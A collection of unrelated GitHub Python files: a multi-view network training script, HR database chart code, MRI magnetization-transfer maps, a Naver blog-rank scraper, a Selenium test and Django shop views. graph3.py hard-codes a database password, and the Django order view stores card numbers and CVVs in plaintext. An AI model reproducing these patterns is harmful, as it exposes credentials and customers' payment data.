(weight_var[v] ** gamma) * loss_temp\n\n weight_up_temp = loss_temp ** (1/(1-gamma))\n weight_up_list.append(weight_up_temp) \n\n output_var = torch.stack(Output_list)\n\n weight_var = weight_var.unsqueeze(1)\n weight_var = weight_var.unsqueeze(2)\n weight_var = weight_var.expand(weight_var.size(0), opt.batchSize, opt.num_classes)\n output_weighted = weight_var * output_var\n output_weighted = torch.sum(output_weighted, 0)\n\n weight_var = weight_var[:,:,1]\n weight_var = weight_var[:,1]\n weight_up_var = torch.FloatTensor(weight_up_list).to(\"cuda\")\n weight_down_var = torch.sum(weight_up_var)\n weight_var = torch.div(weight_up_var, weight_down_var)\n \n # measure accuracy and record loss\n prec1, prec5 = accuracy(output_weighted, target_var, topk=(1, 5))\n losses.update(loss.item(), target.size(0))\n top1.update(prec1[0], target.size(0))\n top5.update(prec5[0], target.size(0))\n\n # compute gradient and do SGD step\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n\n if index % opt.print_freq == 0:\n print('Train-Epoch: [{0}][{1}/{2}]\\t'\n 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n 'Data {data_time.val:.3f} ({data_time.avg:.3f})\\t'\n 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t'\n 'Prec@1 {top1.val:.3f} ({top1.avg:.3f})\\t'\n 'Prec@5 {top5.val:.3f} ({top5.avg:.3f})'.format(\n epoch, index, len(train_loader), batch_time=batch_time,\n data_time=data_time, loss=losses, top1=top1, top5=top5))\n \n print('Train-Epoch: [{0}][{1}/{2}]\\t'\n 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n 'Data {data_time.val:.3f} ({data_time.avg:.3f})\\t'\n 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t'\n 'Prec@1 {top1.val:.3f} ({top1.avg:.3f})\\t'\n 'Prec@5 {top5.val:.3f} ({top5.avg:.3f})'.format(\n epoch, index, len(train_loader), batch_time=batch_time,\n data_time=data_time, loss=losses, top1=top1, top5=top5), file=F_txt)\n\n return weight_var\n\ndef validate(val_loader, model, weight_var, gamma, criterion, best_prec1, F_txt):\n batch_time = AverageMeter()\n losses = AverageMeter()\n top1 = AverageMeter()\n top5 = AverageMeter()\n\n # switch to evaluate mode\n model.eval()\n\n with torch.no_grad():\n\n end = time.time()\n\n for index, (sample_set, sample_targets) in enumerate(val_loader):\n\n input_var = [sample_set[i].cuda() for i in range(len(sample_set))]\n\n # deal with the target\n target_var = sample_targets.cuda()\n\n Output_list = model(input_var)\n loss = torch.zeros(1).to(\"cuda\")\n\n for v in range(len(Output_list)):\n loss_temp = criterion(Output_list[v], target_var)\n loss += (weight_var[v] ** gamma) * loss_temp\n \n output_var = torch.stack(Output_list)\n weight_var = weight_var.unsqueeze(1)\n weight_var = weight_var.unsqueeze(2)\n weight_var = weight_var.expand(weight_var.size(0), opt.batchSize, opt.num_classes)\n output_weighted = weight_var * output_var\n output_weighted = torch.sum(output_weighted, 0)\n\n weight_var = weight_var[:,:,1]\n weight_var = weight_var[:,1]\n\n # measure accuracy and record loss\n prec1, prec5 = accuracy(output_weighted, target_var, topk=(1, 5))\n losses.update(loss.item(), target.size(0))\n top1.update(prec1[0], target.size(0))\n top5.update(prec5[0], target.size(0))\n\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n\n if index % opt.print_freq == 0:\n print('Test: [{0}][{1}/{2}]\\t'\n 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t'\n 'Prec@1 {top1.val:.3f} ({top1.avg:.3f})\\t'\n 'Prec@5 {top5.val:.3f} ({top5.avg:.3f})'.format(\n epoch, index, len(val_loader), batch_time=batch_time,\n loss=losses, top1=top1, top5=top5))\n\n print('Test: [{0}][{1}/{2}]\\t'\n 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t'\n 'Prec@1 {top1.val:.3f} ({top1.avg:.3f})\\t'\n 'Prec@5 {top5.val:.3f} ({top5.avg:.3f})'.format(\n epoch, index, len(val_loader), batch_time=batch_time,\n loss=losses, top1=top1, top5=top5), file=F_txt)\n\n print(' * Prec@1 {top1.avg:.3f} Prec@5 {top5.avg:.3f} Best_Prec@1 {best:.3f}'.format(top1=top1, top5=top5, best=best_prec1))\n print(' * Prec@1 {top1.avg:.3f} Prec@5 {top5.avg:.3f} Best_Prec@1 {best:.3f}'.format(top1=top1, top5=top5, best=best_prec1), file=F_txt)\n \n return top1.avg\n\ndef save_checkpoint(state, is_best, filename='checkpoint.pth.tar'):\n torch.save(state, filename)\n if is_best:\n file_model_best = os.path.join(opt.outf, 'model_best.pth.tar')\n shutil.copyfile(filename, file_model_best)\n\nclass AverageMeter(object):\n \"\"\"Computes and stores the average and current value\"\"\"\n def __init__(self):\n self.reset()\n\n def reset(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n\n def update(self, val, n=1):\n self.val = val\n self.sum += val * n\n self.count += n\n self.avg = self.sum / self.count\n\ndef accuracy(output, target, topk=(1,)):\n \"\"\"Computes the precision@k for the specified values of k\"\"\"\n with torch.no_grad():\n maxk = max(topk)\n batch_size = target.size(0)\n\n _, pred = output.topk(maxk, 1, True, True)\n pred = pred.t()\n correct = pred.eq(target.view(1, -1).expand_as(pred))\n\n res = []\n for k in topk:\n correct_k = correct[:k].view(-1).float().sum(0, keepdim=True)\n res.append(correct_k.mul_(100.0 / batch_size))\n return res\n\n# ============================================ Training phase ========================================\nprint('start training.........')\nstart_time = time.time()\nbest_prec1 = 0\nweight_var = torch.ones(opt.num_view) * (1/opt.num_view) \nweight_var = weight_var.to(\"cuda\")\ngamma = torch.tensor(opt.gamma).to(\"cuda\")\n\nfor epoch in range(opt.epochs):\n # adjust the learning rate\n adjust_learning_rate(optimizer, epoch) \n\n # train for one epoch\n weight_var = train(train_loader, model, weight_var, gamma, criterion, optimizer, epoch, F_txt)\n\n # evaluate on validation/test \n print('=============== Testing in the validation set ===============') \n prec1 = validate(val_loader, model, weight_var, gamma, criterion, best_prec1, F_txt) \n\n print('================== Testing in the test set ==================') \n prec2 = validate(val_loader, model, weight_var, gamma, criterion, best_prec1, F_txt) \n\n # remember best prec@1 and save checkpoint\n is_best = prec1 > best_prec1\n best_prec1 = max(prec1, best_prec1)\n\n # save the checkpoint\n filename = os.path.join(opt.outf, 'epoch_%d.pth.tar' %epoch)\n if is_best:\n save_checkpoint(\n {\n 'epoch': epoch + 1,\n 'arch': opt.basemodel,\n 'state_dict': model.state_dict(),\n 'weight_var': weight_var,\n 'best_prec1': best_prec1,\n 'optimizer' : optimizer.state_dict(),\n }, is_best, filename)\n\nprint('======== Training END ========')\nF_txt.close()\n\n# ============================================ Training End ========================================\n","repo_name":"xujinglin/MvNNcor","sub_path":"MvNNcor_Train.py","file_name":"MvNNcor_Train.py","file_ext":"py","file_size_in_byte":14675,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"85"} +{"seq_id":"13212440243","text":"import psycopg2\nimport json\nfrom decimal import Decimal\nimport sys\n\ndef convert_to_float(data):\n if isinstance(data, dict):\n return {convert_to_float(key): convert_to_float(value) for key, value in data.items()}\n elif isinstance(data, list):\n return [convert_to_float(element) for element in data]\n elif isinstance(data, Decimal):\n return float(data) # Convert Decimal to float\n return data\n\ndef get_data3(quarter):\n conn = psycopg2.connect(\n database=\"Candidate_List\",\n user=\"postgres\",\n password=\"Adduvaith789\",\n host=\"localhost\",\n port=\"5432\"\n )\n cursor = conn.cursor()\n if quarter == 'q1':\n cursor.execute(\"SELECT Employee_Category, COUNT(Employee_Category) FROM list WHERE EXTRACT(MONTH FROM Doj) BETWEEN 1 AND 3 GROUP BY Employee_Category;\")\n elif quarter == 'q2':\n cursor.execute(\"SELECT Employee_Category, COUNT(Employee_Category) FROM list WHERE EXTRACT(MONTH FROM Doj) BETWEEN 4 AND 6 GROUP BY Employee_Category;\")\n elif quarter == 'q3':\n cursor.execute(\"SELECT Employee_Category, COUNT(Employee_Category) FROM list WHERE EXTRACT(MONTH FROM Doj) BETWEEN 7 AND 9 GROUP BY Employee_Category;\")\n elif quarter == 'q4':\n cursor.execute(\"SELECT Employee_Category, COUNT(Employee_Category) FROM list WHERE EXTRACT(MONTH FROM Doj) BETWEEN 10 AND 12 GROUP BY Employee_Category;\")\n else:\n cursor.execute(\"SELECT Employee_Category, COUNT(Employee_Category) FROM list GROUP BY Employee_Category;\")\n \n rows = cursor.fetchall()\n category_counts = {\n 'Consultant': 0,\n 'Contract': 0,\n 'Freelancers': 0,\n 'Interns': 0,\n 'Permanent': 0,\n 'Probationary': 0\n }\n \n for row in rows:\n category, count = row\n category_counts[category] = count\n\n cursor.close()\n conn.close()\n\n cols = [\n {\"id\": \"\", \"label\": \"Employee Category\", \"pattern\": \"\", \"type\": \"string\"},\n {\"id\": \"\", \"label\": \"Count\", \"pattern\": \"\", \"type\": \"number\"}\n ]\n rows = [\n {\"c\": [{\"v\": \"Permanent\", \"f\": None}, {\"v\": category_counts[\"Permanent\"], \"f\": None}]},\n {\"c\": [{\"v\": \"Contract\", \"f\": None}, {\"v\": category_counts[\"Contract\"], \"f\": None}]},\n {\"c\": [{\"v\": \"Consultant\", \"f\": None}, {\"v\": category_counts[\"Consultant\"], \"f\": None}]},\n {\"c\": [{\"v\": \"Probationary\", \"f\": None}, {\"v\": category_counts[\"Probationary\"], \"f\": None}]},\n {\"c\": [{\"v\": \"Freelancers\", \"f\": None}, {\"v\": category_counts[\"Freelancers\"], \"f\": None}]},\n {\"c\": [{\"v\": \"Interns\", \"f\": None}, {\"v\": category_counts[\"Interns\"], \"f\": None}]}\n ]\n\n data = {\n \"cols\": cols,\n \"rows\": rows\n }\n\n return convert_to_float(data)\n\nif __name__ == '__main__':\n quarter = sys.argv[1] if len(sys.argv) > 1 else ''\n data = get_data3(quarter)\n json_data = json.dumps(data)\n print(json_data)\n","repo_name":"Advaith789/ATS-Using-Google-API","sub_path":"Application Tracking System/graph3.py","file_name":"graph3.py","file_ext":"py","file_size_in_byte":2907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"41268258019","text":"import logging\nimport numpy as np\n\nlogger = logging.getLogger(__name__)\n\n\ndef divide_after_removing_zero(dividend, divisor, threshold, replacement=np.nan):\n \"\"\"\n Mask zero, divide, look for numbers larger than 'threshold', and replace masked elements.\n\n :param dividend: np.array\n :param divisor: np.array\n :param threshold: float\n :param replacement: float: value to replace masked value with.\n :return: result_full\n \"\"\"\n ind_nonzero = np.where(divisor)\n n_zero = divisor.size - len(ind_nonzero[0])\n logger.info(\"Found {} voxels with value=0. These will be replaced by {}.\".format(n_zero, replacement))\n # divide without zero element in divisor\n result = np.true_divide(dividend[ind_nonzero], divisor[ind_nonzero])\n # find aberrant values above threshold\n logger.info(\"Threshold to clip values: +/- {}\".format(threshold))\n np.clip(result, -threshold, threshold, out=result)\n # initiate resulting array with replacement values\n result_full = np.full_like(dividend, fill_value=replacement, dtype='float32')\n result_full[ind_nonzero] = result\n return result_full\n\n\ndef compute_mtr(nii_mt1, nii_mt0, threshold_mtr=100):\n \"\"\"\n Compute Magnetization Transfer Ratio in percentage.\n\n :param nii_mt1: Image object\n :param nii_mt0: Image object\n :param threshold_mtr: float: value above which number will be clipped\n :return: nii_mtr\n \"\"\"\n # Convert input to avoid numerical errors from int16 data\n # Related issue: https://github.com/spinalcordtoolbox/spinalcordtoolbox/issues/3636\n nii_mt1.change_type('float32')\n nii_mt0.change_type('float32')\n\n # Initialize Image object\n nii_mtr = nii_mt1.copy()\n\n # Compute MTR\n nii_mtr.data = divide_after_removing_zero(100 * (nii_mt0.data - nii_mt1.data), nii_mt0.data, threshold_mtr)\n return nii_mtr\n\n\ndef compute_mtsat(nii_mt, nii_pd, nii_t1,\n tr_mt, tr_pd, tr_t1,\n fa_mt, fa_pd, fa_t1,\n nii_b1map=None):\n \"\"\"\n Compute MTsat (in percent) and T1 map (in s) based on FLASH scans\n\n :param nii_mt: Image object for MTw\n :param nii_pd: Image object for PDw\n :param nii_t1: Image object for T1w\n :param tr_mt: Float: Repetition time (in s) for MTw image\n :param tr_pd: Float: Repetition time (in s) for PDw image\n :param tr_t1: Float: Repetition time (in s) for T1w image\n :param fa_mt: Float: Flip angle (in deg) for MTw image\n :param fa_pd: Float: Flip angle (in deg) for PDw image\n :param fa_t1: Float: Flip angle (in deg) for T1w image\n :param nii_b1map: Image object for B1-map (optional)\n :return: MTsat and T1map.\n \"\"\"\n # params\n nii_t1map = \\\n None # it would be possible in the future to input T1 map from elsewhere (e.g. MP2RAGE). Note: this T1map\n # needs to be in s unit.\n b1correctionfactor = \\\n 0.4 # empirically defined in https://www.frontiersin.org/articles/10.3389/fnins.2013.00095/full#h3\n # R1 threshold, below which values will be clipped.\n r1_threshold = 0.01 # R1=0.01 s^-1 corresponds to T1=100s which is a reasonable threshold\n # Similarly, we also set a threshold for MTsat values\n mtsat_threshold = 1 # we expect MTsat to be on the order of 0.01\n\n # Convert flip angles into radians\n fa_mt_rad = np.radians(fa_mt)\n fa_pd_rad = np.radians(fa_pd)\n fa_t1_rad = np.radians(fa_t1)\n\n # ignore warnings from division by zeros (will deal with that later)\n seterr_old = np.seterr(over='ignore', divide='ignore', invalid='ignore')\n\n # check if a T1 map was given in input; if not, compute R1\n if nii_t1map is None:\n # compute R1\n logger.info(\"Compute T1 map...\")\n r1map = 0.5 * np.true_divide((fa_t1_rad / tr_t1) * nii_t1.data - (fa_pd_rad / tr_pd) * nii_pd.data,\n nii_pd.data / fa_pd_rad - nii_t1.data / fa_t1_rad)\n # remove nans and clip unrelistic values\n r1map = np.nan_to_num(r1map)\n ind_unrealistic = np.where(r1map < r1_threshold)\n if ind_unrealistic[0].size:\n logger.warning(\"R1 values were found to be lower than {}. They will be set to inf, producing T1=0 for \"\n \"these voxels.\".format(r1_threshold))\n r1map[ind_unrealistic] = np.inf # set to infinity so that these values will be 0 on the T1map\n # compute T1\n nii_t1map = nii_mt.copy()\n nii_t1map.data = 1. / r1map\n else:\n logger.info(\"Use input T1 map.\")\n r1map = 1. / nii_t1map.data\n\n # Compute A\n logger.info(\"Compute A...\")\n a = (tr_pd * fa_t1_rad / fa_pd_rad - tr_t1 * fa_pd_rad / fa_t1_rad) * \\\n np.true_divide(np.multiply(nii_pd.data, nii_t1.data, dtype=float),\n tr_pd * fa_t1_rad * nii_t1.data - tr_t1 * fa_pd_rad * nii_pd.data)\n\n # Compute MTsat\n logger.info(\"Compute MTsat...\")\n nii_mtsat = nii_mt.copy()\n nii_mtsat.data = tr_mt * np.multiply((fa_mt_rad * np.true_divide(a, nii_mt.data) - 1),\n r1map, dtype=float) - (fa_mt_rad ** 2) / 2.\n # remove nans and clip unrelistic values\n nii_mtsat.data = np.nan_to_num(nii_mtsat.data)\n ind_unrealistic = np.where(np.abs(nii_mtsat.data) > mtsat_threshold)\n if ind_unrealistic[0].size:\n logger.warning(\"MTsat values were found to be larger than {}. They will be set to zero for these voxels.\"\n \"\".format(mtsat_threshold))\n nii_mtsat.data[ind_unrealistic] = 0\n # convert into percent unit (p.u.)\n nii_mtsat.data *= 100\n\n # Apply B1 correction to result\n # Weiskopf, N., Suckling, J., Williams, G., Correia, M.M., Inkster, B., Tait, R., Ooi, C., Bullmore, E.T., Lutti,\n # A., 2013. Quantitative multi-parameter mapping of R1, PD(*), MT, and R2(*) at 3T: a multi-center validation.\n # Front. Neurosci. 7, 95.\n if nii_b1map is not None:\n nii_mtsat.data = np.true_divide(nii_mtsat.data * (1 - b1correctionfactor),\n (1 - b1correctionfactor * nii_b1map.data))\n\n # set back old seterr settings\n np.seterr(**seterr_old)\n\n return nii_mtsat, nii_t1map\n","repo_name":"spinalcordtoolbox/spinalcordtoolbox","sub_path":"spinalcordtoolbox/qmri/mt.py","file_name":"mt.py","file_ext":"py","file_size_in_byte":6151,"program_lang":"python","lang":"en","doc_type":"code","stars":179,"dataset":"github-code","pt":"85"} +{"seq_id":"23315383461","text":"import json\r\nimport time\r\nfrom time import sleep\r\n\r\nimport urllib\r\nfrom urllib.request import Request, urlopen\r\nimport re\r\n\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nfrom selenium import webdriver\r\n\r\nimport concurrent.futures\r\n\r\n# ### 알고리즘 ###\r\n# 1. 아이디 입력\r\n# 2. 해당 블로거 최신글 10개 가져오기\r\n# 3. 해시태그와 제목 비교. 키워드 자동생성 클릭시, 일치하는 가장 긴 단어를 추출\r\n# 4. 추출 된 단어는 수정 가능해야함.\r\n# 5. 최종으로 수정된 키워드를 검색 클릭시, 모바일view탭에서 몇위인지 안내.(AD 제외 순위)\r\n# 6. 키워드만 변경 후, 클릭시 재동작\r\n# 7. 키워드 자동생성 클릭시, 검색어 값에 ��시 값 입력되기.\r\n\r\n\r\n### 블로그 지수 확인 ###\r\n# 아이디입력\r\nidid = 'like5183'\r\n\r\n\r\n#### 블로그 최신글 10개 가져오기 ###\r\n#### selenium ###\r\n# 크롬 켜기\r\n# driver = webdriver.Chrome('C:/chromedriver.exe')\r\noptions = webdriver.ChromeOptions()\r\noptions.add_argument(\"--headless\")\r\ndriver = webdriver.Chrome('./chromedriver', chrome_options=options)\r\n# driver = webdriver.Chrome(\"drivers/chromedriver\")\r\n# 주소 접속. 꼭 모바일로 접속하기\r\ndriver.get('https://m.blog.naver.com/'+idid)\r\nsleep(0.5)\r\n# 나열식으로 보기\r\ndriver.find_element_by_class_name(\"btn_list\").click()\r\nsleep(0.5)\r\n# 파싱\r\nreq = driver.page_source\r\nsoup = BeautifulSoup(req, 'html.parser')\r\n# 크롬 끄기\r\ndriver.close()\r\n# 닉네임가져오기\r\nnickname = ''\r\nnickname = soup.find(class_='user_name').text\r\n# 제목 가져오기\r\nb = soup.find_all(class_='title ell')\r\nsleep(0.5)\r\n# 제목 tlist랑 공백제거 tlist_no_space(키워드자동완성위함)\r\ntlist = []\r\ntlist_no_space = []\r\nfor i in range(0, len(b)):\r\n tlist.append(b[i].text)\r\n tlist_no_space.append(b[i].text.replace(\" \", \"\"))\r\n########## 링크 linklist ###########\r\nlinklist = []\r\nfor a in soup.find_all('div', {\"class\": \"postlist\"}):\r\n linklist.append('https://m.blog.naver.com/' +\r\n idid + a['id'].replace('pl_', '/'))\r\n\r\n\r\n### 함수 정의 ###\r\n########## 각 글별 자동키워드(해시태그분석) 가져오기 #########\r\ndef find_key_auto(number):\r\n testlist = []\r\n testlist.append(nickname)\r\n testlist.append(str(number) + \"번째\")\r\n testlist.append(tlist[number])\r\n req = requests.get(linklist[number])\r\n req = req.text\r\n soup = BeautifulSoup(req, 'html.parser')\r\n # 태그가져오기\r\n if soup.find(class_='post_tag') == None:\r\n testlist.append('-') # 일치없음 > 공란처리 ****************************\r\n else:\r\n tags = soup.find(class_='post_tag').text\r\n tags = tags.replace(\"\\n\", \"\")\r\n tags = tags.split(\"#\")\r\n tags = list(filter(None, tags))\r\n # 해시 태그와 제목의 중복값 리스트 만들기\r\n samelist = []\r\n for i in tags:\r\n if i in tlist_no_space[number]:\r\n samelist.append(i)\r\n else:\r\n pass\r\n\r\n # 가장 긴 키워드를 메인키워드로 하기\r\n # 값이 같을시, 먼저 써있는게 우선으로 나옴\r\n if samelist == []:\r\n testlist.append('-') # 일치없음 > 공란처리 ****************************\r\n else:\r\n best = 0\r\n for index in range(len(samelist)):\r\n if len(samelist[index]) > len(samelist[best]):\r\n best = index\r\n testlist.append(samelist[best])\r\n testlist.append(linklist[number])\r\n\r\n key_auto_list.append(testlist)\r\n\r\n\r\n### 멀티쓰레드 ###\r\nkey_auto_list = []\r\nwith concurrent.futures.ThreadPoolExecutor() as executor:\r\n executor.map(find_key_auto, [(i) for i in range(0, len(linklist))])\r\n\r\n#### 판다스 df3 / 글10개 + 키워드 등###\r\ndf3 = pd.DataFrame(key_auto_list, columns=['닉네임', '최신순', '제목', '키워드', 'URL'])\r\ndf3 = df3.sort_values(by=['최신순', ], ascending=True)\r\ndf3 = df3.reset_index(drop=True)\r\n\r\n\r\n####### 키워드별 뷰 30개씩 정보 가져오기 #######\r\nauto_choice = list(df3['키워드'])\r\n### 키워드 입력 ###\r\n### 지금은 오토로 가져온걸로 되게 하기 ###\r\nkey_list = auto_choice\r\n\r\n# 함수설정\r\n\r\n\r\ndef viewrank(keyword):\r\n if keyword == '-': # 수정******************************\r\n pass\r\n\r\n elif keyword == '': # 수정******************************\r\n pass\r\n elif keyword == None: # 수정******************************\r\n pass\r\n else:\r\n total_view_count = 'https://m.search.naver.com/search.naver?sm=mtp_hty.top&where=m&query='+keyword\r\n req = requests.get(total_view_count)\r\n req = req.text\r\n soup = BeautifulSoup(req, 'html.parser')\r\n noad_view_count = len(soup.find_all(class_='bx _svp_item'))\r\n adview_count = len(soup.find_all(class_='ico_ad spview_bf'))\r\n\r\n key_url = 'https://m.search.naver.com/search.naver?where=m_view&query=' + \\\r\n keyword + '&sm=mtb_viw.all&nso=&mode=normal&main_q=&st_coll=&topic_r_cat='\r\n req = requests.get(key_url)\r\n req = req.text\r\n soup = BeautifulSoup(req, 'html.parser')\r\n # 첫페이지 40여개 파싱\r\n search_all = soup.find_all('a', {'class': 'api_txt_lines total_tit'})\r\n # View 순위용 숫자\r\n rank_numb = 0\r\n ###\r\n for k in range(0, len(search_all)):\r\n # 광고는 지나가기\r\n if 'https://adcr.naver.com' in search_all[k]['href']:\r\n pass\r\n else:\r\n list_sub = []\r\n # 광고 없을 때의 순위 따로 채크\r\n rank_numb = rank_numb + 1\r\n list_sub.append(rank_numb)\r\n # 제목\r\n title = search_all[k].text\r\n list_sub.append(keyword)\r\n list_sub.append(title) \r\n list_sub.append(search_all[k]['href'])\r\n list_sub.append(noad_view_count)\r\n list_sub.append(adview_count)\r\n list_main.append(list_sub)\r\n\r\n\r\n### 멀티쓰레드 ###\r\nlist_main = []\r\nwith concurrent.futures.ThreadPoolExecutor() as executor:\r\n executor.map(viewrank, key_list)\r\n\r\ndf2 = pd.DataFrame(list_main, columns=[\r\n 'View 순위', '키워드', '제목', 'URL', '통합View 노출수', '통합View AD수'])\r\ndf2 = df2.sort_values(by=['키워드', 'View 순위', ], ascending=True)\r\ndf2 = df2.reset_index(drop=True)\r\n\r\n### 값 체크하기 ###\r\nranking_list = []\r\nfor i in range(0, len(list_main)):\r\n testlist = []\r\n if df2['URL'][i] in list(df3['URL']):\r\n testlist.append(int(df2['View 순위'][i]))\r\n testlist.append(str(df2['URL'][i]))\r\n testlist.append(str(df2['통합View 노출수'][i]))\r\n testlist.append(str(df2['통합View AD수'][i]))\r\n ranking_list.append(testlist)\r\n else:\r\n pass\r\n\r\ndf4 = pd.DataFrame(ranking_list, columns=[\r\n 'View 순위', 'URL', '통합View 노출수', '통합View AD수'])\r\ndf4 = df4.sort_values(by=['View 순위', 'URL', ], ascending=True)\r\ndf4 = df4.reset_index(drop=True)\r\n\r\n### 결과 값 ###\r\ndf_final = pd.merge(df3, df4, on=\"URL\", how='left')\r\n\r\nx = df_final.to_csv()\r\n# print(x)","repo_name":"sebastianrcnt/hwaseon","sub_path":"legacy/blog_rank.py","file_name":"blog_rank.py","file_ext":"py","file_size_in_byte":7255,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"42504135311","text":"#!/usr/bin/env python\n# encoding: utf-8\n\n\"\"\"\n@author: zhanghe\n@software: PyCharm\n@file: test_web.py\n@time: 2016/11/22 上午10:52\n\"\"\"\n\n\nimport unittest\nimport sys\nsys.path.append('..')\n\nfrom config import CHROME_DRIVER_PATH, PROXY\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.by import By\n\n\nclass LoginTest(unittest.TestCase):\n\n def setUp(self):\n # self.driver = webdriver.Firefox()\n chrome_options = webdriver.ChromeOptions()\n chrome_options.add_argument('--proxy-server=%s' % PROXY)\n self.driver = webdriver.Chrome(executable_path=CHROME_DRIVER_PATH, chrome_options=chrome_options)\n\n def test_get_page_title(self):\n url_link = 'https://www.s2c.wealink.com/index/need'\n self.driver.get(url_link)\n web_title = self.driver.title\n # print web_title, type(web_title)\n self.assertEqual(web_title, u'8公里 - 找同城服务,解决您的一切生活问题', u'测试失败')\n\n def tearDown(self):\n self.driver.close()\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"zhanghe06/selenium_project","sub_path":"tests/test_web.py","file_name":"test_web.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"29151327780","text":"from django.shortcuts import render, redirect\nfrom .models import *\n\n\ndef overview(request, id):\n product = Product.objects.get(pk=id)\n data = {\n 'title': product.name + ' | Shopzesta',\n 'product': product,\n }\n return render(request, 'product/overview.html', data)\n\n\ndef products(request):\n categories = Category.objects.all()\n products = Product.objects.all()\n num_of_query = 9\n\n cat_query = request.GET.get('category')\n\n if cat_query and cat_query != 'None':\n products = products.filter(category__name=cat_query)\n\n page = int(request.GET.get('page')) if request.GET.get('page') else 1\n\n print(num_of_query, page)\n\n data = {\n 'title': 'Shop | Shopzesta',\n 'products': products[(page-1)*num_of_query: page*num_of_query],\n 'categories': categories,\n 'cat_query': cat_query,\n 'page': page,\n 'prev_page': page - 1,\n 'prev_page2': page - 2,\n 'prev_page3': page - 3,\n 'next_page': page + 1,\n 'next_page2': page + 2,\n 'next_page3': page + 3,\n }\n return render(request, 'product/products.html', data)\n\n\ndef cart(request):\n if not request.user.is_authenticated:\n return redirect('user:login')\n\n cart = Cart.objects.filter(user=request.user).first()\n data = {\n 'title': 'Cart | Shopzesta',\n 'cart': cart,\n 'cart_items': CartItem.objects.filter(cart=cart)\n }\n\n if request.method == 'GET':\n return render(request, 'product/cart.html', data)\n\n if request.method == 'POST':\n product = Product.objects.get(pk=request.POST['product'])\n quantity = int(request.POST['quantity'])\n cart_item = CartItem.objects.filter(product=product).first()\n\n cur_quantity = cart_item.quantity if cart_item else 0\n\n if product.count_in_stock - quantity - cur_quantity < 0:\n data['error'] = 'Not enough stock'\n return render(request, 'product/cart.html', data)\n\n cart_item.quantity += quantity\n\n if cart_item.quantity == 0:\n cart_item.delete()\n else:\n cart_item.save()\n\n return redirect('product:cart')\n\n\ndef add_to_cart(request):\n if not request.user.is_authenticated:\n return redirect('user:login')\n\n if request.method == 'POST':\n product = Product.objects.get(pk=request.POST['product'])\n quantity = int(request.POST['quantity'])\n qty_abs = request.POST.get('qty_abs')\n\n cart = Cart.objects.filter(user=request.user).first()\n cart_item = CartItem.objects.filter(\n product=product, cart=cart).first()\n\n if product.count_in_stock - quantity < 0:\n data = {\n 'title': 'Cart | Shopzesta',\n 'cart': cart,\n 'cart_items': CartItem.objects.filter(cart=cart),\n 'error': 'Not enough stock',\n }\n return render(request, 'product/cart.html', data)\n\n if cart is None:\n cart = Cart(user=request.user)\n cart.save()\n\n if cart_item is None:\n cart_item = CartItem(product=product, quantity=quantity, cart=cart)\n cart_item.save()\n else:\n if qty_abs:\n cart_item.quantity = quantity\n else:\n cart_item.quantity += quantity\n\n cart_item.save()\n\n return redirect('core:index')\n\n\ndef create_order(request):\n if not request.user.is_authenticated:\n return redirect('user:login')\n\n if request.method == 'POST':\n cart = Cart.objects.filter(user=request.user).first()\n\n if cart is None:\n return redirect('product:products')\n\n # Checking count in stock\n cart_items = CartItem.objects.filter(cart=cart)\n\n for cart_item in cart_items:\n if cart_item.product.count_in_stock < cart_item.quantity:\n data = {\n 'title': 'Cart | Shopzesta',\n 'cart': cart,\n 'cart_items': cart_items,\n 'error': 'Not enough stock',\n }\n return render(request, 'product/cart.html', data)\n\n order = Order(\n user=request.user,\n total_price=cart.total_price,\n first_name=request.POST['first_name'],\n last_name=request.POST['last_name'],\n email=request.POST['email'],\n address=request.POST['address'],\n address2=request.POST['address2'],\n zipcode=request.POST['zipcode'],\n name_on_card=request.POST['name_on_card'],\n card_number=request.POST['card_number'],\n expiration=request.POST['expiration'],\n cvv=request.POST['cvv'],\n )\n order.save()\n\n for item in cart_items:\n order_item = OrderItem(\n order=order,\n product=item.product,\n quantity=item.quantity,\n qty_price=item.qty_price\n )\n order_item.save()\n\n cart.delete()\n\n return redirect('core:index')\n\n\ndef remove_from_cart(request):\n if not request.user.is_authenticated:\n return redirect('user:login')\n\n if request.method == 'POST':\n product = Product.objects.get(pk=request.POST['product'])\n cart = Cart.objects.filter(user=request.user).first()\n\n cart_item = CartItem.objects.filter(\n product=product, cart=cart).first()\n\n if cart_item:\n cart_item.delete()\n\n cart_item = CartItem.objects.filter(cart=cart).first()\n\n if cart_item is None:\n cart.delete()\n\n return redirect('product:cart')\n","repo_name":"himelbikon/shopzesta","sub_path":"product/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"14153805840","text":"import random\n\nfrom generator_types.base import BaseTypeGenerator\n\n\nclass Email(BaseTypeGenerator):\n email_providers = [\"@gmail.com\",\n \"@yahoo.com\",\n \"@outlook.com\",\n \"@aol.com\",\n \"@protonmall.com\",\n \"@icloud.com\",\n \"@gmx.com\"]\n\n def get_next_value(self, related_values=None) -> any:\n sample = \"\"\n if related_values:\n firstname = related_values[0].lower()\n lastname = related_values[1].lower()\n sample = firstname + lastname + random.choice(self.email_providers)\n return 